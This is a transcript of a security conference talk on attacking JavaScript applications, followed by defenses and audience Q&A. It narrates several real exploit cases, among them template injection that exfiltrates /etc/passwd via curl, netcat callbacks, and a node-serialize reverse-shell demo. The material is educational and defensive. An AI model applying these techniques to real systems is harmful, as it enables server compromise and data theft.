 Good afternoon, everyone. Just finished lunch. This is not sleepy time. I'll try it and keep this as interactive as possible, right? My talk is titled, Safety Not Guaranteed. It's part of something larger that we're doing today called the Application Security Clinic, right? Absolutely, my colleagues are in the audience. And I'll explain what we're going to do the rest of the session itself. My name is Riyaz Balikar. The title, Safety Not Guaranteed. Anybody gets a reference? Anybody in the audience? Yes. It's a movie about time traveling and how somebody's traveled through time once. And they're asking for volunteers to travel back with them. But they cannot guarantee their safety. We picked up this name because it sounded pretty cool. But apart from that, the idea that JavaScript libraries and frameworks, right? You have so many of them coming out every month, every year. And all of them add features that were previously built. They take care of security considerations that were found earlier as well, right? They may all sound shiny and everything. They may look shiny and everything. But how do you guarantee safety, right? I work for Absaco. I am the chief attacker at Absaco. I have the company itself. We do a lot of consulting work. And the opinion, the advice that we give to clients is extremely pragmatic, actionable advice on terms of security issues that we discover, right? We are a specialist security company. This is a question to the audience. How many of you think this is a vulnerability? So if it's not visible on screen, that's a very popular site. You must have seen the URL around here. But this site, if you open the console, OK? And you check the jQuery version. It tells you that it is 2.1.3. And if you use the $get method to call an external JS file, it actually loads and executes and alerts for a document or cookie. Is this a vulnerability or not? I will say yes. I will say no. The rest are like, I'm still digesting my lunch. All right, we come to this. So what is the application security clinic? And the thing that we want to cover today, what the thing we want to do today? This is essentially the, we're trying to create a time in space for security discussion. If it's not visible, the background is of time in space, right? But the idea is that we want to create an environment here, we want to create a discussion amongst all you folks so that we understand what's happening in terms of security with the actual developer world, right? And this is a three-part thing. This is the talk going on here. And we have a curated Q&A and a Birds of Feather discussion. This will happen at the banquet hall downstairs. At the end of this talk, we'll have a Q&A session. And then for the Birds of Feather discussion, we move downstairs to the banquet hall. That's at 4 o'clock. My team is, we click this on the first day of fragments. My team is here in the audience as well. So we'll all be taking questions at the end of the talk. Where's my team? All right, this is about me. My name is Riyaz Valikar. I'm the chief attacker at Absaco. I have several years of experience breaking stuff. I've been doing offensive work with all kinds of stuff, including networks, Windows networks, Linux networks, mobiles, IoT devices, wireless networks, and application security. But my knowledge with JavaScript frameworks and libraries is very limited. I will come through with the perspective of an attacker today, which is why I have an exclusive slide for this, saying that I break stuff for a living. I'm not a developer. I tried to find an abbreviation that would make sense to the deaf folks. But NAD was not taken. And I apologize if anybody is offended by the image. That's me, as I don't want to infer that people slouch while programming with us there. What are we going to look at today? We're going to look at what do attackers look for when they're targeting applications, specifically when they're looking at JavaScript applications. What are they targeting for? We'll also look at some publicly disclosed security weaknesses in frameworks and libraries and applications that have been built over using these frameworks and libraries. We'll look at some client-side issues. We'll look at some server-side JavaScript issues. And we have a lot of stories, but I've selected a couple of them for this talk. And we are going to be presenting that from our pentesting experience. Also, a tiny bit of the talk will also cover the impact of exploitation. This is one of the things we find difficult when we're trying to explain these two developers, that the impact of an XSS, for example, or the ability that an attacker can inject JavaScript, arbitrary JavaScript in your code. And the developer is like, OK. So what? So we try and answer that question if possible. I'll also cover a brief overview of content security policy, ending it with what is sub-resource integrity and some security headers that a browser already provides that you can use in activating your code. All right, so the first section. As an attacker, how do I look at JavaScript applications? How do I look at any application for that matter? It's basically you profile the target, right? And you target an attack. That is essentially what is covered in the most simplistic manner. I'll come to a little detail in that, but given the number of frameworks and libraries, the choices out there, right? This can be overwhelming because when I started looking at frameworks and libraries, I had to first understand what is the difference between framework and library. I had to get started from that point. And then I had to move on to looking at different frameworks and libraries available out there. But all of this is visible to the attacker as client-side HTML and a server-side component, which is why the attacker's setup could be as minimal as the attacker himself and what is known as an interception proxy. How many of you have used an interception proxy before? Like Burp, this is the icon for Burp, Burp Suite, okay? And you have the web server where the code is hosted, right? What an interception proxy is essentially, it's a software that sits between your browser and the web server and allows you to tamper your request and incoming responses, okay? So if there is some restriction on the client-side, I can use an interception proxy to change my data that is being sent across the network before it reaches the server. And if there is some restriction that the code is going to place on a response, I can intercept that, modify it and let it render in my browser. That's what an interception proxy does. Burp Suite, for example, apart from being an interception proxy, it has a lot of other features in terms of where you can use it to attack, repetitively do a brute force attack, for example. It has a bunch of modules, bunch of features that I'll not cover today, but as something that you would want to try, you could definitely do this. So when looking at JS apps, attackers, this is like a brief summary. There's an extended version of this slide at the end of the talk. But what do attackers look for? The first and foremost, when they're trying to profile the target, they would want to know what is the framework version. Identify the framework itself first, then identify the version, right? Because versions allow them to search for previously disclosed security issues. There are a lot of active security researchers who are targeting specific JavaScript libraries, JavaScript frameworks, and they tend to find issues and disclose them publicly. All of this becomes useful when I'm trying to break an application. We also look at sources and syncs. A source for, when I'm looking at an application, a source is the point where data is entered into the browser's DOM, and the sync is where it is going to be used. As simple as an input field and an inner HTML write. We also look for error messages and stack traces, especially if you see the console logs, if there's anything that is printed in terms of verbosity, and especially client-side, dynamic, and hard-coded variables. We've had luck where we found, several times, we found security weaknesses because something that was hard-coded inside the client-side code. And obviously, communication channels like WebSockets, WebRTC, if I would want to find out the, WebRTC, for example, attackers especially uses to find internal IP addresses behind knotted machines. Let's look at a couple of security weaknesses, right? These are a list of popular, publicly disclosed vulnerabilities in different systems and applications that have been using frameworks and libraries. We'll cover the client-side vulnerabilities first and we'll move to the server-side issues next. So there is a framework called Mevo. How many of you have used Mevo? It's fairly new. All right, the idea is that in Mevo, the URL object, right, you have a dollar URL, you could access the URL object using the dot parameter. So you're gonna have dollar URL dot A will give you access to the A parameter in the URL. Something like this. So if you have spec and its value is test, you could access the value test by doing dollar URL dot spec, okay? The vulnerability which was discovered and researched well on was that there was, if you specifically use the dollar URL dot spec directly into code, can anybody tell me what is the implication of this? What would happen? XSS, yes, what is XSS? XSS, cross-site scripting, yes. The idea that even a user supplied input is used directly inside the output without sanitization, without removing characters, right? That are malicious that could break HTML. And this results in a XSS vulnerability. In this case, clearly, user supplied data because you control the parameter in this way. If I do spec equal to test, it gets called in as the one of the issues with this was that the input that would provide required it to be a valid JavaScript as well as a valid URL. Only then the exploit would work, right? And you do that by supplying spec equal to JavaScript colon, the popular alert, which is used as a proof of concept for script injection. And the comment character, so that this gets commented and this is rendered as proper JavaScript. And then this is the path, right? You use something called double encoding. Percentage 25 is also converts to percentage and then 2f is slash. And at the end of this, you have this as the input and this would result in XSS, okay? This is one of the client side weaknesses that this framework was suffering from. AngularJS and expression template injection is the second example that I have. Templating can be tricky. I actually have a demo of this setup. This was a bug in Uber. Uber had an application, right? And one of the subdomains. And the application was using an older version of Angular. 1.1.2.0, right? The server did not allow quotes, but the way the setup was that you could inject curly braces and expand them and rather execute the expression, okay? So templating was possible. The idea, the attackers wanted to, you know, generate a proper proof of concept for this. But what was disabled is that you couldn't simply, you know, inside those double curly braces, put an alert and get a POC out of it. Because apart from not being able to allow, not allowing it to do an eval or alert, the object.constructor itself was inaccessible. So the attackers had to build a POC that would allow them to access the constructor, right? And use that to call a function to call alert, okay? The final exploit was obtained using the string constructor from multiple literals. So you create an empty array, right? And then you add each character from the output of each of these and form the word constructor, okay? The final exploit looks like this. Actually, I have a demo of this, okay? So in the URL, it's q equal to some data that you can provide. So I'll say my apps are going to be really simple like this, okay? There's no UI or anything to them. So there is reflection here. The code takes data as is, but if you look at the source, okay? It's an Angular app. The code on the server, the PHP code, takes data as is and reflects it back to the screen, back to the client. So when I say q equal to confirm if templating is allowed, I'll say five minus one, for example. So it definitely works. And when I run the exploit code, the idea was to obtain the constructor to find the function prototype to call and alert, right? What I'm trying to show you that is, regardless of applications, using standard frameworks and libraries, every time you let client data be handled inside output, vulnerabilities can creep in, okay? And attackers are finding innovative ways of executing their code to do this. This is another XSS in a software called as MDWiki. MDWiki allows markdown files to be loaded, okay? Using an XML HTTP request. It allows for markdown files to be loaded. The thing is, the URL is example.com slash hash exclamation and the markdown file. The code did a XHR to location and it would obtain the hash, the value after the hash exclamation and then call an XHR on this. If I as an attacker wanted to load arbitrary JavaScript, I would have to provide my endpoint here, right? So the exploit, final exploit looks something like this, okay? Where this is my URL where this file contains the alert or the JavaScript that is going to be finally loaded. One thing is going to prevent this vulnerability or rather this exploit from triggering. Can anybody tell me what that is? Because this is a different domain, right? And when the page is loaded, it will not directly get executed. So we had to add a origin header to the content that is sent back, saying access control allow origin, asterisk, okay? So which would allow then this domain to load our file and execute it. All right, a couple of server side weaknesses as well. Dust.js, this vulnerability was found on a PayPal subdomain, okay? Pretty well documented as well. A Dust.js is a templating engine for node. It used, this function has been removed, but the older version of Dust and .js used an if helper, okay? What the if helper would do is if you provided a condition, right? And based on that condition, you could ask it to display or render something. The catch was that, for example, if you had, this is the actual URL. So you have demo.paypal.com slash us demo navigation device equal to desktop. On the server side, you had an if, the if helper for device. If it is desktop, then show the div. If it is mobile, then show this. And that was the code. But internally, the if helper was using something that, you know, when attackers see would get them one step closer to executing their own code. Can you see what the vulnerability is in this code? Right, so on line 215, if internally uses eval for the condition, right? So, and apart from that, the application itself had some filters to prevent strings from coming up. So the attacker concatenated arrays to empty arrays and injected the node express code that was required. So require child process, exec. And what it did was, this is the attack code where it did a curl with to his domain with the output of etc password. So this is the etc password of demo.paypal.com, right? Because the if helper object was using an eval. There's pretty hefty bug bounty amount as well. The other one, service side template injection in Jade, which is I believe now called pug, is a templating engine again for node. This is not exactly a vulnerability in itself, but more like a feature abuse, okay? The idea is that no matter what you have, as long as you take user input and make it part of your code or do some processing on it, there is the possibility that you could end up breaking stuff. This is an example of templating can actually lead to code execution. If user input is not sanitized before use somewhere else. The example for this demo was on codepen.io. The specific exploit that would work has been fixed, but the rest till where you could stop one step before executing code on server, that part still works. So I kind of reproduced it. Let's see what it is. This is not a vulnerability in codepen itself or Jade, but a feature abuse. It's an example of feature abuse based on the context of implementation. I'm assuming everybody's used codepen at some point in time. So I declare a variable X and then I try and enumerate. My JavaScript is pretty bad, but I was trying to enumerate, you know, I was trying to get familiar with the interface for Jade itself. Then I look for the root namespace, okay? And you can enumerate this on the server itself. I then try and enumerate the root dot process, okay? And it gives me access to all the other sub methods and other things that I can call. So from this, the interesting bit is actually gone down. There were bunch of other commands you could run in terms of what this would do. But what I did was I looked at the, in root dot process, there's a working directory command, which would get me the current working directory on the server. So I'm technically able to enumerate variables on the server here, right? And the next thing that I tried was the getUID. There was a function listed here called getUID. It would tell me the UID of the owner of this process that is executing on the server. But the bit that was implemented was they had a check on keywords like getUID and other things. So the way to bypass this was I simply split it into two strings, concatenated and called it. So that was like a bypass on their protection, okay? Interestingly, I would want to, if I would not just, if I would want to execute my own code, I would require the child process. And I'm trying to see if I can get access to that. So using root dot process, I enumerate main module and see if require is available. It is. So I tried to arbitrarily load a module called A. A is not found, right? Which is why I get a cannot find module. But interestingly, before, after this was the next step where you could do code execution, right? Interestingly, the person who found this was able to obtain child process and issue an accept command. What this was doing was the output of ID was sent to this IP address on port 80 using netcat. And they had code execution on this, okay? Again, not a vulnerability with code pen, but feature abuse. If you're using Jade to build apps, there's something that you might want to look at. This is another interesting vulnerability with Node.js, Node.serialize, rather. This was discovered by a community, fellow community security researcher, his name is Ajin. And while doing a code review, we found that the user's cookie was being sent to the unserialized function, right? And internally, the unserialized function uses eval for deserialization, okay? As a result of this, and because cookies are obtained from the client, right? And most some developer that I know would inherently trust that malicious data would not be found in cookies. You would sanitize input at the login or the input text fields, right? But there have been cases where we found security issues with, when we've put in malicious data inside user agent strings, inside cookies, right? Anything that goes from the client to the server is tamperable, because of the interception proxy, something like that. We can use intercepted and tamper with the contents and then send it out. I'll do a demo of this in a little while. But as simple as it is, the most simplistic code that you could implement was this. If you notice, the serialized unserialized function is called, and this is the cookie that is passed. I'll do a demo of this when we come to the section on the impact, right? I have a pretty cool demo lined up for this. Some of these stories from our pentesting experience, okay? Apart from finding issues like these, most of the times you find issues that can be easily avoided if security was built into the idea that attackers are going to send malicious content to my application. Right? We've been able to compromise multiple applications at the work that we do at AppSec. We've been able to compromise multiple applications simply because of a very tiny, miniscule vulnerability and we've been able to chain multiple of those across networks and systems to be able to gain the ultimate price. The ultimate price for attackers is mostly data or shell execution on the, or command execution on the server, right? Mostly data, but also, I prefer the command execution bit. The other folks in my team prefer the data. So there's the difference in opinion there. Let's see some of the stories. This was a popular one. Internally, we had one of our clients, pretty large client in the financial sector. They had, they were using a React app to deliver UI, right? And JSON authenticated endpoints populated the data and that's what I understood of the setup. The idea was, especially when we were trying to figure out endpoints in the application. One of the things, earliest things that we did was, we looked at the application. We put it, when we tried to access the application, use the interception proxy, right? We didn't have credentials for the application. So when we were looking at the application, we intercepted the response and where it said authenticated no, we added authenticated yes in the response, okay? We didn't have any session, nothing was created, but when I let the traffic come back to the browser because of the change in the interception proxy, the browser rendered some of the UI elements and we knew what the admin or the user would see, right? I work with visual cues. So it was important for me to see what the admin or the user would see. And it was pretty interesting to see that all the application had to do was once the JSON, if authenticated, JSON would come back in popularity. It was, it was a marvelous discovery in my experience. But then I realized that this wouldn't be a vulnerability because this is how apps work, JS apps would work. Interestingly, the application was encrypting the password before sending it to the server, okay? So when it had a login page and the username and password fields were there and there was another third field, it's not relevant. But the password field, the password was encrypted before being sent out to the server. So in the interception proxy, I was seeing the encrypted password, okay? And the question that we asked all the other attacker we asked was how is this encrypting, right? Where is the key being stored? And the key was the static key. And they had done all sorts of things to hide the key with a lot of JavaScript, simply randomly calling bunch of other things that would not do anything. But the key was well hidden and it took some time to figure out that the key was right there on the client and what the key was actually. So they used the static key before being sent to a server and the idea was that the same key was being used on the server for decryption. And that's a fair assumption. If you encrypt something on the client and you send it to the server, it would require the same key on the server to be able to decrypt it. The key and the IV was stored in plain text in a convoluted mass of client-side JS, right? In one of the libraries. The interesting bit was the client was reusing the same crypto components on multiple sites, okay? So the client was a vendor for somebody else, right? And they were using, they had built multiple applications and they were using the same key and IV across all of these applications. What is the problem with this? Hack one, all a hack. The primary problem we saw with this as an attacker was that if in the future is there's security breach, and we hear of security breaches all the time and there are a lot of websites that allow you to put your email address and tell you whether your email was found in a breach or not, right? And something that we also actively do as one of the services. We try and find if your email address is compromised actively. But if your account is compromised and your encrypted password is leaked, okay? Leaking the key and IV would allow decryption on the client side, it makes the decryption on the client side possible. But it would be a pain point to the client more so because a data breach leaking, encrypted credentials would hurt the client more because the key was available, right? You would be able to decrypt all the entire database dump. So when the media says that there was a breach but the credentials were encrypted, you need to ask how the encryption happened. It might so be that the key is lying there in the browser for somebody to pick it up and reverse your encrypted tokens. The second interesting thing that we had for a different client again was again a very large client in the financial sector was using a very resource heavy JS framework. Interestingly, it had the X-Frame options header said to prevent clickjacking attacks, okay? I'll come to the X-Frame options header a little later. But the idea was that because of the X-Frame options header you couldn't overlay or rather iframe this domain by another website. It is a whole series of attacks called clickjacking attacks where you can using hidden divs and other things you can steal data and it would appear that you're putting in data into the actual domain but it actually brings in the rails, right? The X-Frame options header prevents that from happening. It tells the browser don't load this into an iframe, okay? When I saw the X-Frame options header we were convinced that there is no clickjacking but the interception proxy also has a scanner module. It passively looks at the traffic that is going through the interception proxy and tells you if there is any security weakness, right? The, it kept complaining that the site was vulnerable which was interesting because there was an X-Frame options header but the interception proxy was telling us that the site was vulnerable to a clickjacking attack. This was the header, there was a typo in the header. If you look at the X-Frame options header same origin here, there was a typo in the header. Can you see it? You will not believe when you see this, right? There's a tiny space here, there's a single space at the beginning causing the header to fail, right? And we were able to then build a POC. It allows to iframe the site. As if the protection not there at all. We created a POC of phishing attacks and the fix was as simple as removing that space, right? But it crept in. That was the thing that I wanted to share. This was another one where there was a client we were looking at and it had a regular expression that checked if the domain that it was trying to load had a specific string in it, right? Again, large customer in the automobile industry, they had a blog that had functionality to load pages, okay? From the web group directory. So the URL again was something of this order. Example.com slash hash register, okay? And cross-site requests were being prevented using a regex check. This is a regex. So when I try to access, if I say hash httpx41 code access.php, that's the server that on which I host all my export codes. It's an invalid page because it doesn't start with the, so if you try to load pages from the web root, it would work. But if you try to load another domain, it would not work. What are the bypass for this? I can't change this. Like if I want to attack somebody else, what URL do I send them? If you look at the code, it was not checking if it is in the beginning. It was checking if it is anywhere, right? So you were able to do this, load the attacker file and put the client domain at the end of the line and the exploit work, okay? Your successful exploitation led to, we compromised a higher privilege account and we were able to log in and access a lot of data from this application itself. You hear about XSS and code execution vulnerabilities and other things and what exactly is the impact? XSS, we hear you can steal tokens and sessions and bunch of those things, right? Really short on time, so I'll just skip the XSS demo, but there is this framework called beef, okay? Which is actively used by a lot of attackers to take access to the next level. Not only apart from stealing session tokens, but you can control the browser in a lot of other ways and this is the interface and once you are hooked, you supply the beef hook.js, you will be, you have access to this framework where it allows you to execute a lot of other things. Like if you're using an older browser, you can simply select metasploit and say ought upon. It'll find a vulnerability that the browser is vulnerable to and exploit it for you and you'll get a shell on the client's machine. Apart from bunch of things, if you can also use it to steal tokens from the page and send phishing, you change the content of the page so that you can trick the user into enabling your webcam and stuff and takes access to the whole new level. I'll just run the demo for the node serialized bug. My node app looks like this. Just prints hello and data from the cookie. This is what Burp looks like, okay? This is the interception proxy that I was talking. I have enabled interception now. So when I load this page, okay? You can see that I'm able to intercept, right? So I will forward this. If I reload this page, you can see that the cookie was set by the server. I can see what the value of this cookie is. I'll put it in decoder. It has a lot of functionality that you can actively use to check the security of your apps. This decodes to this string, the serialized string username, my name, country, India and city, Bangalore, right? And on the server, it picks the username part from the string and does a print. Now, the exploit that I have, what I'm doing is I'm going to do an exec and call out to bin bash or other send bin bash. I'm sending this as the profile value. This I have on my machine, I have started a netcat handler. I'm targeting this domain. Just hope it works. So when I send it, the code is deserialized on the server, right? And the eval causes you to execute the netcat bin bash function. And hopefully, right? So this is a different server. So now, because of the vulnerability, you're able to execute or rather get a reverse shell back on your machine and take control of the system itself. Okay? So code execution bugs are bad because attackers, if they're able to execute commands on a server, it's almost always game over. We'll quickly move to the next section, content security policy. This has been a standard for quite some time where by setting headers, right? In your, in the browser, in your HTTP responses, you can choose where data is going to be loaded from. Okay? These are called directives and you can set the kind of directives you want. So for example, if you want script sources to be a specific domain, right? You can set that as a policy. There are a bunch of them. This is what a policy looks like. In the most simplest form, this is what a policy looks like, right? It says default source. If like the other sources are not available, image source or connect source, it falls back, falls back to the default source. The default source is none. Script source is only self, right? Connect source is self, image source is self. So you can't load like cross domain images and stuff. But this is too simplistic. In the real world, they look something like this, okay? Again, this is for a PayPal domain. As an attacker, this gives me a lot of information. I know more domains about PayPal as one. The other thing is if any of these domains is a place where I can write my data as an attacker and then if I find an issue with this site, I would be able to load my script regardless of whether a CSP is there or not. Because if any of these domains, like imagine if this was like a Amazon S3 URL, right? I could set up my domain itself, my script and then load it from there. CSP also has a reporting format where violation reports can be sent as JSON post to the URI. If the policy looks like this, content security policy and then report URI, the domain where you would want to collect your data, like consider this policy, okay? So you have default source, none, style source, CDN and report URI is this. So when I try to load this, right? It, I'm trying to load a stylesheet from the same domain. This will fail. So it sends this as the CSP, you know, as a violation. This is the JSON post that is done. Coming to the next part, sub-resource integrity. Can you tell me if you view sub-resource integrity? Yes, okay. The idea is to answer the question, is the file you fetched, really the file you fetched, right? Sub-resource integrity works, is a security feature in browsers, the enabled browsers to verify the files that you've obtained. And for example, from a CDN, for example, are delivered without unexpected changes. It works by allowing you to provide a cryptographic hash that a fetched file must match. And if you, if you get a file from a remote CDN, its hash should match the hash that is already in script in your HTML. Why do you think that's necessary or why do you think that will help? As somebody tampers with the content on the way, the hash will fail and then the browser will not load the file, right? So it's pretty useful. This is how it looks like, you have script source and the source and the integrity variable set to the SHA of this file. How do you generate this on the server? Multiple ways you can use OpenSSL or SHA-SAM to generate this and put it in the page. So if somebody tampers with this and you would still, the browser would still not load the file itself because the hash check has failed. With combination of CSP, you can add it to content security policy, require SRI, that's the directive for script and require SRI for stack. These two directives is something that you can pass. Couple of other additional security headers that browsers have that would work in two defense, in terms of defense to slow down attackers. One of them is the X-axis protection, designed to enable and enforce the X-axis filter built into modern browsers. X-axis protection one enables it and it has two modes, mode block and report URI. The HTTP strict transport security allows you to restrict the order to access content only over HTTPs. This is another header that you can add. The extreme options, we saw an example of a type of the extreme options but this prevents pages from being loaded in iframes, thereby providing click jacking protection. It has different modes. The deny is if you don't want it to load in any iframe, regardless of who the origin server is. And the XFM option, same origin, allows you to load the iframe if you are the origin, right? And you can explicitly set what origin using the allow from. Another one is the X content type options. This can be used to set, this can be set to no sniff. What this allows you to do is, this prevents rather browsers from guessing what the content type of the response is. If you send mixed data, I sometimes does that. I know I is mostly used to download other browsers but some people still use, some people still use I because requirements and other things. I sometimes would sniff at the content type and guess based on what the content is, right? So this allows you to strictly say that don't guess but use the content type response header that is coming back. What are the other couple of things that you can do? I found this on a site that is, somebody had submitted a bug too, right? Doing this will not stop attackers, okay? I mean the console is actively used by developers as well as attackers to figure out a bunch of information. So it says if you can't be behind, this is a console for developers. If someone has asked you to open this window, they're likely to compromise your account. Please close this window now. Okay, this is not going to stop attackers. I discovered this because of the help of one of my colleague who's a much better node developer than I am. He taught me about helmet, right? And I believe a lot of node developers already use this. If you don't, then helmet is pretty cool. You can use this to set custom security headers as simple as, Mr. Learning is as simple as dot hide powered to hide your version and no SNAP and access filter, no referral policy, et cetera. And you can also set the content security policy using these directives. It's pretty cool. Retire.js is another project. It's many things, but we actively use this as part of Burp Interception Proxy. It gets loaded at the module inside Burp and you can use this to find if any of the libraries that you're using in an application are outdated, right? All you have to do is add this to Burp and browse your website. At the end of your browsing session, go back to your Interception Proxy, look at the target and it'll tell you that these libraries are outdated. CSP evaluator is another website that you can use to see if your CSP will hold or rather it is syntactically right and hold to. You can try different directives here and check if your CSP directives are syntactically right. So, one of the common questions that we ask is where do you start if you want to look at application security and where do you want to go next and if you want to break stuff and understand the mindset of an attacker and other things. The OASP project is a very good resource. They have something called as the OASP ASVS. OASP is the open web application security project. It has a lot of documentation around how you can attack applications and build some applications securely. The OASP top 10 is like a list of most common vulnerabilities that people code to when attackers try and see if these vulnerabilities exist in their applications. There's also the testers guide if you want to become active with security testing. And obviously the security documentation for your framework and library would be very helpful in this case. Apart from that, if you start thinking like a potential attacker, look at the attack surface that our application provides and what are the assumptions that are made already in the system. These are two important things that would work in that favor. So, coming back to the takeaway, when looking at JS apps, what do attackers see? What do they target? What do they look for? Again, identification of frameworks and libraries, version numbers especially are very clearly written in your JS files. Using that, they look for previously discovered security issues, sourcing for user supplied data, endpoints discoverable through JS code, error messages and stack traces, console messages, another thing. Embedded, hardcoded variables and tokens, browser storage mechanisms. Sometimes you see an application store data and local storage and session storage. That can get sometimes a sensitive information right there. Cross-origin communication, external sources of JS, CSS, images, fonts, any static content that you load. And communication protocols like WebSockets and WebRTC. This is again a reminder part of the application security cleaning that we are running. That's our Twitter handle. Thank you so much. We'll have a question and answer session now. I would like to call upon my colleagues, Akash Mahajan and Abhishek Dutta as well on stage. And we also have time for questions in the hall. So if you have any questions, yeah, this side. So at the start, you showed JS foo website, but you did not answer the question. I was waiting for you to ask. How many of you again still think that this is a vulnerability? No, I'm the one, three, four. How many of you don't think this is a problem? We had an internal debate about this and we figured that this wouldn't be a problem because to get this to exploit, to exploit this, you're asking the user of the app to open the console and recommendation, please add the message stop close console right now, right? But we noticed that to properly execute code we'd have to go through a lot of hoops and by itself, this is the feature of jQuery to be able to call URLs from third party. Hi, very interesting talk. I have a couple of questions that are not related to each other. One of the things I've noticed, especially working rather accessing sites in India, especially government sites, is that security is not at all a priority. In fact, I remember once accessing the IPSF site and they were sending the one-time password both to the client and the server. So you can just see the response and you can see the one-time password. So my question is when you find these vulnerabilities, how do you go about gently reporting them, especially in the government domain, if you do that? And how do you like instill that sort of sense that you need to make security a priority? One, and then the second question is about service workers which is a relatively new spec in JavaScript. I saw a talk by Crockford, Douglas Crockford, and he said that service worker, the API is one of the biggest vulnerabilities in the JavaScript HTML spec right now. So have you guys looked into that and is there like any advice on that aspect? Yeah, as individuals, we may be reporting these, but we usually don't report vulnerabilities that much. I'll figure out the mic. Is it working now? Oh, sorry. Yeah, we don't really report vulnerabilities. There is a mechanism where you can report to two different agencies, but usually nobody responds or the main email might bounce, right? But the one is your cert website which is supposed to be the nodal agency, but they're usually overwhelmed. And the other is this new agency that's been set up the national, it's the critical infrastructure something. NC some, I think, double I or whatever, you can, if you Google for national critical infrastructure in India, you'll get that website. So they are supposed to be the ones to kind of become the people to send it off to whatever is a relevant department, right? Typically in other countries where security reporting and triage is common for government agencies, you usually have sectoral certs, right? If for an industry or for a particular sector, you'll have an emergency response team and typically they will be the ones receiving these, but we don't have that yet. And the second question, I don't have experience with service workers as such, but that's very interesting to know that that's a vulnerability area. We haven't really tested any applications so far. So if you have one, let us know. Any questions from Balcony? Yeah. Hey guys, thank you for the talk. Have you guys ever seen languages which compile to JS like Elm and how, because you're not actually writing JavaScript, you're actually writing in some other language which compiles to JavaScript. So are there any security vulnerabilities or does it improve security or in what, how does it affect security as such? Have you guys looked into it? The short answer, it makes no difference at all. The longer answer is we typically don't think of the language, the framework or the application feature. We typically look at request response and we try to enumerate what request can be manipulated by user input, right? So if you have a look at an application or anything around the application, that's the first thing to look at. The second is to understand and consider are there any configuration based infrastructure things in place, okay? For us, if we control the network, if we control the network between the client and the server, then anything which is SSL, TLS, it doesn't matter because whatever is going to secure on the client side assumes the endpoint not to be evil, right? Anything which assumes any of the response headers, which are meant to protect the end user because the browser understands it, right? So Riaz joked about that IE doesn't understand something, right? That just means that a modern version of the browser will understand that response header and not allow or allow something, right? But it is very trivial to strip off that header. And if the header doesn't reach the browser, the browser doesn't know, right? So for us, the most important part is the user input. But consider if there's an application where you have to, you know, trust the user. Any application which is like a, which is enabling payments, right? You're saying that, okay, I allow people to buy stuff or, you know, send money over or whatever. That particular user for that transaction cannot be considered evil. Your architecture has to make sure whatever fraud check, whatever reconciliation has to happen and has to happen on the server side, right? Anywhere, you know, be it a mobile app, you know, a single page app, anything where the business logic ends up in the client which the end user can obviously manipulate, right? Then it's game over. Does that answer your question? Anyone else? Yeah, question there. Hello. Please stand while asking the question. Please stand up while asking the question. We are recording. Fine. Okay, one day I was creating an application where a user can enter some number and number used to validate on the server side. It should not be zero or it should be the valuable point what he has. So if you enter the maximum limit of the end of number, so Node.js was not taking that one and user was able to enter the number. How do you tackle that one? On the server side, have a different data type for the check then? Mm-hmm. No, even before that, if you're design, if you're architecture for the application, your requirements have the number to be in a particular range. Correct, correct. And you can check only for that range. And I think this is like an overflow that nodes the recognition. What you're saying is that if the number is larger than certain value, then Node.js is not considering that. I really think you should look into the documentation of Node.js, like how it treats the integer and what are the corner cases and accordingly handle that. Like... It will raise the runtime exception then. End 16, end 32, different. All right, or maybe there are other libraries to handle large numbers. Like in Ruby, I know there is a class called big num that is meant to handle very large integers. Like it is more than 32 bits. Yeah, question that side? PHP also has a similar plan. So, usually what I see in a lot of teams is that security is always an afterthought, right? Like people, after the company is big enough or after they get hacked once, that is when people start taking up security seriously, right? And I guess as front end developers, most of the attacks start at us, right? Something as simple as XSS. So, I'm kind of asking for recommendations of what are the few things that, like where do front end developers get started and how do they make security part of their development process rather than an afterthought? You want the funny answer or the real answer? Let's start with the funny one. Change the company. So, I'll just tell you, right? I tried that, it didn't work. Well, someone who's hiring, you know who to talk to. Like he asked, right, why don't government agencies really think about security? And why government websites tend to be insecure? The reality is most things that we look at because our world is a little more tinted, are insecure, right? And it is immaterial if it's like a large Indian company or a large wherever company or a small startup in Bangalore or a small startup in the valley. Most people are thinking of features and what to release rather than how to stay secure. Unless and until it's led by legislation or compliance or something else, right? I honestly don't have a good answer for you. What I would say is that we are available downstairs after this, maybe we can continue the discussion there but there is no simple answer, sorry. The resources available, what he's asking is how does he convince his company? Oh, I can't really tackle that. Sounds like this will be a fantastic discussion for the rest of this clinic, which is at four o'clock downstairs in the round table area. I think we're ready with our next presentation. So let's give a round of applause.